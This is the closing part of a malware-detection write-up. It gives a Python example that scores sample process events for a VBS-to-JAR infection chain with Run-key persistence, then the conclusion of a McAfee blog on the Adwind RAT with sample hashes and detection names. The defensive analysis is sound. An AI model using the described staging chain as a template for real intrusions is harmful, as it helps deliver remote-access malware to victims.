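    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe", "Image": JAVAW,
     "CommandLine": f'"{JAVAW}" -jar "C:\\Tools\\build\\app.jar"'},
]

if __name__ == "__main__":
    for name, idx in evaluate(SAMPLE_EVENTS):
        print(f"{name:26} event {idx}")
    print("chain stages observed:", stages_seen(SAMPLE_EVENTS))
```

Each rule on its own will produce some noise (Java-based installers do write Run values), which is why the example also counts distinct stages: the combination of script-host spawn, staged JAR and Run persistence on one host is far stronger than any single hit.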

    Conclusion:

    In the past, we have seen threat actors use two similarly functioning malware families in a single infection. Usually, threat actors choose this path for a higher probability of successful infection.

    The hashes used in the analysis:

    Sample.jar: 07cb6297b47c007aab43311fcfa9976158b4149961911f42d96783afc517226a

    Ntfsmgr.jar: ee868807a4261a418e02b0fb1de7ee7a8900acfb66855ce46628eb5ab9b1d029

    McAfee advises users to keep their anti-malware signatures up to date at all times. McAfee products detect the malicious JAR files as Adwind-FDVH.jar! [Partial hash] and Adwind-FDVJ.jar! [Partial Hash], with DAT versions 9137 and later.

    The post JAVA-VBS Joint Exercise Delivers RAT appeared first on McAfee Blogs.